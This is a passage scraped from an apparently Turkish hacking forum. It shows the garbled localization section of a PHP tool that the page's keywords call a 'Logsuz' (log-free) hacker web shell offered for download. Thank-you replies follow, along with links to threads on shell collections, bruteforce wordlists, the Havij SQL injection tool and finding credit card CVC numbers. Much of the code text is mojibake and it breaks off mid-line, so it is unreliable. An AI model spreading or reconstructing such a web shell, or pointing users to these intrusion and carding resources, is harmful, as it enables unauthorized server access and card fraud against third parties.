'permission_not_set' => 'Pr�¡va k "[%1]" nemohla b��t zm��n��na na [%2].',
'not_readable' => 'Soubor "[%1]" nen�­ mo�Ÿno p��e���­st.'
        );

    case 'ru':

        $date_format = 'd.m.y H:i:s';
        $word_charset = 'KOI8-R';

        return array(
'directory' => '�����',
'file' => '��',
'filename' => '� �����',

'size' => '���',
'permission' => '��',
'owner' => '����',
'group' => '����',
'other' => '����',
'functions' => '�����',

'read' => '������',
'write' => '������',
'execute' => '���������',

'create_symlink' => 'óÃ�Ã&
Beğenenler:
#2
eline emeğine sağlık exciting
Beğenenler:
#3
Teşekkürler exciting
Beğenenler:
#4
eline sağlık abi
Beğenenler:
#5
paylaşım için tesekürler hocam
Beğenenler:

Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  Cyberizm Shell Merkezi iMoGeN 22 6,018 06-12-2016, Saat: 20:34
Son Yorum: J3adJ3oy
  Yeni Bruteforce WordList for Cyberizm KingSkrupellos 105 6,080 27-11-2016, Saat: 12:39
Son Yorum: Dragon Caliph
  Cyberizm | Explorer Shell iMoGeN 186 12,400 19-11-2016, Saat: 10:38
Son Yorum: SheelWe
  Havij 1.5 Advanced SQL Injection Programı + Cyberizm + 29/11/15 KingSkrupellos 54 1,618 14-11-2016, Saat: 17:26
Son Yorum: gen3sis
  Kredi Kartı CVC Güvenlik Numarası Bulma (Cyberizm Özel) iMoGeN 512 24,306 06-11-2016, Saat: 16:43
Son Yorum: tacsızhacker
Anahtar Kelimeler

Logsuz hacker_20 Shell + Özel Cyberizm indir, Logsuz hacker_20 Shell + Özel Cyberizm Videosu, Logsuz hacker_20 Shell + Özel Cyberizm Online izle, Logsuz hacker_20 Shell + Özel Cyberizm Bedava indir, Logsuz hacker_20 Shell + Özel Cyberizm Yükle, Logsuz hacker_20 Shell + Özel Cyberizm Hakkında, Logsuz hacker_20 Shell + Özel Cyberizm Nedir, Logsuz hacker_20 Shell + Özel Cyberizm Free indir, Logsuz hacker_20 Shell + Özel Cyberizm Oyunu, Logsuz hacker_20 Shell + Özel Cyberizm Download


1 Ziyaretçi